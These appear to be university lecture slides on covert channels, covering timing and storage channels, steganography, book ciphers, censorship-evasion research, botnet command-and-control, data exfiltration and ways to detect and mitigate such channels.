Covert Channels
Paul Seymer [email protected]
Some (Good) Definitions
Covert Channels:
● (official) Prof. Fleck's Covert Channel Slides 9:
“A covert channel is a path for the illegal flow of information between subjects within a system, utilizing system resources that were not designed to be used for inter-subject communication.”
● “A path of illegal information flow using mediums not intended for communication” (a liberal paraphrasing)
● (general) Communication through a medium that violates a global security policy without violating local ones.
Some (Good) Definitions
● Prof. Fleck's Covert Channel Slide 9:
“two human users talking over coffee is not a covert channel”
● This is an example of an overt channel: communication channels being used as intended.
• downloading web content from a public web server
• using emailing to submit a class assignment to your TA
• talking to a relative on the telephone
• waving to a friend
Some More (Good) Definitions
Covert Channels:
● (general) Communication through a medium that violates a global security policy without violating local ones
● (specific) DoD standards : Orange Book circa early 1980s
● Storage Channel: via a shared storage location
● Timing Channel: via some observed event frequency
Timing Channels
● Sita and Rama want to communicate without anyone else knowing. They both sit on the same computer network.
● Rama knows to watch his local network traffic starting at the top of every hour, for 5 minutes.
● Sita wants to send Rama the following message :
“Dogs barking. Can't fly without umbrella”
How could this be accomplished? Timing Channels
● Sita converts her message into ASCII decimal values:
D o g s b a r k i n g . C a n ' t f l y ...
68 111 103 115 32 98 ...
● Sita pings (the ICMP one) Rama's computer 68 times, then 111, then 103, ….
● Rama observes the network, counts the pings, and looks up the values in an ASCII table to recover the text. Storage Channels
● Sita and Rama want to communicate. This time, Rama is in a foreign country, on a network that blocks the ICMP protocol, so the timing channel wont work.
● Rama is in another time zone, and the two won't be online at the same time.
● Sita must leave Rama the message via some Storage Channel, so he may retrieve it later, when he is online.
How could this be accomplished? Storage Channels
● Sita runs a web server. Rama has access to the server via HTTP, and can download pages without raising suspicion.
● Sita sticks are reverse proxy in front of the web server that modifies outgoing TCP packets to store custom bit patterns in a reserved (unused) field of the packet header.
S o u r c e P o r t D e s t i n a t i o n P o r t S e q u e n c e N u m b e r A c k n o w l e d g m e n t N u m b e r 0 0 0 W i n d o w S i z e C h e c k s u m U r g e n t P o i n t e r
● As these bits are usually ignored, they will remain when sent Storage Channels
● Rama connects to the server to download some web page.
● He has a browser plug-in that reads these bits, and reconstructs the message.
● But wait a sec... 3 bits can only hold values 0 through 7 ? Can this still be used?
● Sita and Rama must mitigate an issue with the channel's bandwidth (capacity), or create a larger channel.
● The two will need to modify how the messages are sent through the channel...as the maximum size of the channel is smaller the message fragments that need to be sent.
● “D” = 68, which needs a minimum of 7 bits to send. Channel Capacity
● Shannon-Hartley Theorem
C = B log2 (1 + S/N) B: bandwidth S/N : Signal (power) to Noise (power) Ratio * but lets assume a noiseless channel for now:
● Packets from Web Server : 10 packets / sec
● Sita's storage channel capacity: 3 bits * 10 packets / sec = 30 bits / sec
Some (Bad) Definitions
● The Characteristics section of the “Covert Channels” Wikipedia* page. Some True or False:
• Steganography is not a type of Covert Channel? (paragraph 2)
• Covert channels are hard to create in modern environments? (paragraph 1)
• Covert channels are easily detectable by “monitoring system performance”?
• A covert channel is not the same thing as means for “disallowed”
communication relayed through an Overt channel? (paragraph 3)
• “Secure operating systems can easily control legitimate Channels”
(paragraph 3)
* http://en.wikipedia.org/wiki/Covert_channel Some (Bad) Definitions
● The Characteristics section of the “Covert Channels” Wikipedia* page. Some True or False:
(false) • Steganography is not a type of Covert Channel? (paragraph 2)
(false) • Covert channels are hard to create in modern environments? (paragraph 1)
(false) • Covert channels are easily detectable by “monitoring system performance”?
(false) • A covert channel is not the same thing as means for “disallowed”
communication relayed through an Overt channel? (paragraph 3)
(false) • “Secure operating systems can easily control legitimate Channels”
(paragraph 3)
* http://en.wikipedia.org/wiki/Covert_channel Steganography
● Greek origin → steganos : “covered” + graphei : “writing”
● Broad definition : Hiding some information inside some thing so that an outside observer cannot distinguish the version of the thing with the hidden information from the version without it.
● Examples:
• Replacing bits in an image file, with bits from some message
• Writing on a post card with “disappearing ink” (ink that is only viewable after contact with some chemical)
th • Replacing every 20 frame of a video (like in the Pitt, Norton movie)
● The thing being hidden within is the Cover and provides a Cover Channel. The means through with information is hidden in the Cover provides the Covert Channel. Steganography
7 1 8
2 5 4
3 6
Steganography
7 1 789BEC 8 789BDC 789BED 689BEC 2 4 5 788BEC 789AEC 789BEC 3 6 779BEC F3EDAC Steganography
78 = 01111000 1 9B = 10011011 ED = 11101101 789BED 789BEC
68 = 01101000 8 9B = 10011011 78 = 01111000 EC = 11101100 9B = 10011011 689BEC EC = 11101100 F3 = 11110011 6 ED = 11101101 AC = 10101100 F3EDAC Steganography
78 = 01111000 1 9B = 10011011 ED = 11101101 789BED 789BEC 1 bit / Pixel
68 = 01101000 8 9B = 10011011 78 = 01111000 EC = 11101100 9B = 10011011 689BEC EC = 11101100 1 bit / Pixel F3 = 11110011 What is the 6 ED = 11101101 Channel AC = 10101100 F3EDAC Capacity ? 9 bit / Pixel Better Steganography
● “Russian Spies' Use of Steganography Is Just the Beginning” (2010) http://www.technologyreview.com/view/419833/russian-spies-use-of-steganography-is-just-the-beginning/
● “Silent Skype calls can hide secret messages” (2013) http://www.newscientist.com/article/dn23044-silent-skype-calls-can-hide-secret-messages.html#.Undaa_k_tXs
● “4 New Ways to Smuggle Messages Across the Internet” (2013) http://spectrum.ieee.org/telecom/security/4-new-ways-to-smuggle-messages-across-the-internet Steganography creates a covert channel over an overt channel, by hiding secrets within a cover channel.
The difference then becomes a matter of intent. The nature of the message decides if it is a covert channel or an overt one...if the intent of the sender is to communicate covertly, in a way other than the intended use of the channel, it is...by definition, a covert channel. Not-So-Obvious Covert Channels
“a”
Not-So-Obvious Covert Channels
“a” could mean:
• “a”
• “0”
• “61”
• “Attack at dawn”
• “Get the the embassy asap”
Pre-shared knowledge between sender and receiver dictates the contents of the channel
Book Ciphers
● A means of sending secret messages where a book (remember those?) was used as an index reference for code words. Only the sender and receiver know which book to use.
● A message sender would send a receiver a list of places in the book to look up and find the message word.
● Index Examples:
400, 302, 423
Page 6, line 2, character position 6
● “Book” examples
A particular edition of an english dictionary
A particular translation of a bible. More Covert Channels
● “DNS as a Covert Channel Within Protected Networks” Seth Bromberger, NESCO http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/DNS_Exfiltration_2011-01-01_v1.1.pdf
● “Embedding Covert Channels into TCP/IP” Steven J. Murdoch and Stephen Lewis, http://www.cl.cam.ac.uk/~sjm217/papers/ih05coverttcp.pdf
● Embedding plain text, over HTTP
• Leveraging the volume of HTTP traffic, and variation on content
• How is this Overt? How is this Covert? Will using HTTP change your answers? SSH Tunneling? Is this Covert, or Overt?
Using Covert Channels
● (almost) Everything is “Dual Use”
• Using magical powers for good
Protecting free speech and free press
Protecting other forms of clandestine communication • Using magical powers for evil
Communicating illegal content
Exfiltrating data out of “secure” environments
Coordinating Terrorist Attacks
Controlling Botnets and RATs
Prisoner Problem
● “The Prisoner's Problem and the Subliminal Channel” Gustavus J. Simmons (CRYPTO '83) http://www.iacr.org/cryptodb/data/paper.php?pubkey=1754
● Two prisoners, physically isolated from one another wish to communicate: They create a covert channel within legitimate looking messages (the cover channel).
● The warden's employees transport the messages only if they appear to be innocent (e.g. an overt channel)
“Journalist” Adversary Model
● A foreign correspondent “Jill” is reporting under a cover identity in a country without a free press, ruled by an oppressive regime.
● Jill wishes to submit an inflammatory news story about the regime to her bosses back home.
● The Regime owns every domestic ISP, and is capable of filtering inbound and outbound Internet traffic based on IP address and TCP/UDP port.
● The Regime has the capability of terminating all Internet communication, but typically does not do so due to financial and commercial impact. They must selectively block as needed.
How can Jill submit her story? What safety factors concern her? “Activist” Adversary Model
● A citizen “Jim” had political beliefs that differ from those of his government. Jim lives in a country were free speech is weakly protected, and most press is controlled by the government, and heavily censored
● Jim wishes to organize a large scale anti-government protest during the next “election” (he's a really big thinker), and will need to communicate with many other citizens.
● The Regime temporarily terminates Internet connectivity, but leaves domestic network services (in-country blogging, email, delivery pizza websites, etc.) and deploys high powered wireless jamming technology over its major cities.
How can Jim organize with his peers? What safety factors concern him? “Journalist” Adversary Model
● Jill cares about:
• Protecting her location and cover identity
• Protecting any sources names in her article
• Ensuring the story is not modified en-route
• Jim cares about:
• Non-Attribution of the messages
• Protecting the identity of his peers
• Ensuring the messages are secret at least until the election cycle is over
Covert Channel Design Goals
Using covert channels has advanced well beyond the notion of simple secret communication:
● Reliability: The channel should consistently be available for use...e.g. comms shouldn't be “called off for rain”.
● Resilience: The channel should resist blocking, or have redundant paths from sender to receiver in the event blocking can occur
● (Non)-Attribution: The channel should provide un-linkability (for whomever is at risk should they be tied to some comms)
● Message Secrecy: The channel should provide a means by which the messages being sent are kept secret from an observer during transit. Why not just use encryption?
Whats wrong with Encryption
● Encryption can be defeated, particularly when standard methods are used
● Encryption raises suspicion: “Why is this one host sending random looking bit streams of fixed length to an IP address in a foreign country”? ← this can be an “anomaly”
● Encryption may be computationally impractical for the receiver
• although, this really isn't a problem anymore, when even our wristwatches can browse the Internet
● But...Encryption may be optimal for providing secrecy, requiring another means to provide non-attribution and other services.
Covert Channels for “Good”
● “Evading Censorship with Browser-Based Proxies” (PETS 2012) D. Fifield, N. Hardison, J. Ellithorpe, E. Stark, R. Dingledine, P. Porras, and D. Boneh
• Short lifetime proxies, running as plug-ins in browsers on hosts in a non- censored region.
• Interfaces with Tor network, relaying Tor communications.
• The secret sauce is the notion that the large size of potential hosts to provide proxy services will outnumber the Adversary's ability to block them all.
Question: Is this a Covert Channel? Why? Why Not?
Covert Channels for “Good”
● “Telex: Anticensorship in the network infrastructure” Wustrow, E., Wolchok, S., Goldberg, I., Halderman, J.A (USENIX 2011)
“friendly” ISPs outside of a censored region collude with Jill or Jim to relay traffic to censored destinations.
Innocent web requests are “tagged” in a way that the friendly ISP can detect, but the censor cannot.
The “friendly” ISP intercepts these requests and proxies them to the censored destination on behave of Jill or Jim.
The censor sees communication with a safe website
Question: Is this a Covert Channel? Why? Why Not?
Covert Channels for “Good”
● “Message In A Bottle: Sailing Past Censorship” Luca Invernizzi, Christopher Kruegel and Giovanni Vigna (HOTPETS '12 )
Two parties communicate over a common blog (via comments, or posts)
Each party can “monitor” a blog, which is a feature that sends notifications to an email list when new messages are posted.
A sender embeds secret messages in an image, and posts it to a blog “monitored” by the receiver.
The receiver obtains the posted image, and recovers the hidden content
Question: Is this a Covert Channel? Why? Why Not?
Using Covert Channels
● (almost) Everything is “Dual Use”
• Using magical powers for good
Protecting free speech and free press
Protecting other forms of clandestine communication • Using magical powers for evil
Communicating illegal content
Exfiltrating data out of “secure” environments
Coordinating illegal acts
Controlling Botnets and RATs
Controlling Botnets
● What are Botnets?
● What are the components of a Botnet?
• the bot
• the bot master (a.k.a. bot hearder, or the guy behind the keyboard)
• the command and control channel (C2)
• What is a RAT?
• Remote Access Tool, Remote Access Trojan, Remote Administration Tool, etc....
• Sometimes a type of botnet, sometimes with C2. Controlling Botnets
● What does this have to do with covert channels?
● The Bot Master has the same needs as Jill and Jim
• secrecy
• non-attribution
• reliability
• So...its C2 channel is often a covert channel
• Goals:
• Subvert a network's IDS (lets assume static signatures won't work)
• Means:
• Look like an employee on the network (Avoid anomaly detection)
Controlling Botnets
● What does this have to do with covert channels?
● The Bot Master has the same needs as Jill and Jim
• secrecy
• non-attribution
• reliability
• So...its C2 channel is often a covert channel
• Goals:
• Subvert a network's IDS (lets assume static signatures won't work)
• Means:
• Look like an employee on the network (Avoid anomaly detection)
Controlling Botnets
Some (casual) additional reading:
● https://blog.damballa.com/archives/tag/poison-ivy
● http://www.informationweek.com/security/vulnerabilities/blackhole-botnet-creator-buys- up-zero-da/240145769
● http://www.redteamsecure.com/labs/post/28/Botnet-Command-and-Control-via-Covert- Channels
● http://www.irongeek.com/i.php?page=security/steganographic-command-and-control
Data Exfiltration Channels
● Some data is monitored to ensure proper use and nondisclosure
• Classified documents
• Trade Secrets
• Passwords (e.g. from a keylogger)
● Covert Channels can be used to exfiltrate this data : bypass mechanisms put in place to maintain control over the release and use of some data, in order to deliver it to unauthorized entities
• Using any of the types of channels we have discussed.
Mitigating Covert Channels
● Detection
● Eliminating
● Constricting Bandwidth
● Monitoring/Intelligence Gathering
Detecting Covert Channels
● ...is very very hard
● Claim: “Secure” environments know what benign communication look like...so just deploy an anomaly detector to find things that look “malicious.”
http://xkcd.com/927/ http://en.wikipedia.org/wiki/File:Rumsfeld1.jpg Detecting Covert Channels
● Anomaly detection often fails:
• Enumerating all “good” behavior is difficult, and expensive
• Covert Channels are design to “look like” overt channels
• False Positives are expensive
● Network malfeasance is often a reaction to defensive capability.
● Network defense is often a reaction to detected malfeasance.
Adversaries, then, usually have a time advantage, unless the defender can see into the future. Defenders also typically have more operational constraints. Adversaries rarely “play by the rules;” Defenders often times, do or must. Eliminating Covert Channels
● Reprocessing Images “just in case” they have something hidden in them.
• Compressing an image (this will often overwrite the hidden content)
• Converting a loss-less image to a lossy image (or vice ver- sa)...or converting file formats in general.
Effective, but expensive. Why?
Constricting Channel Bandwidth
● Simply...Lower network throughput, or restrict the number of connections a single user or host can make over some period of time.
● If the covert channel itself has a low capacity, it will take longer to relay a message. Reducing network throughput exacerbates this problem, potentially rendering the channel unusable)
Monitoring / Intelligence Gathering
● Perhaps the most threatening to Jill and Jim
● An adversary can passively eavesdrop on a channel (undetectable, by definition) and potentially collect intelligence on the channel, its participants, its goals, and any details needed in order to defeat it.
● “Rubber Hose Attack” https://www.schneier.com/blog/archives/2008/10/rubber_hose_cry.html http://bojinov.org/professional/us enixsec2012-rubberhose.pdf
http://xkcd.com/538/
Q + A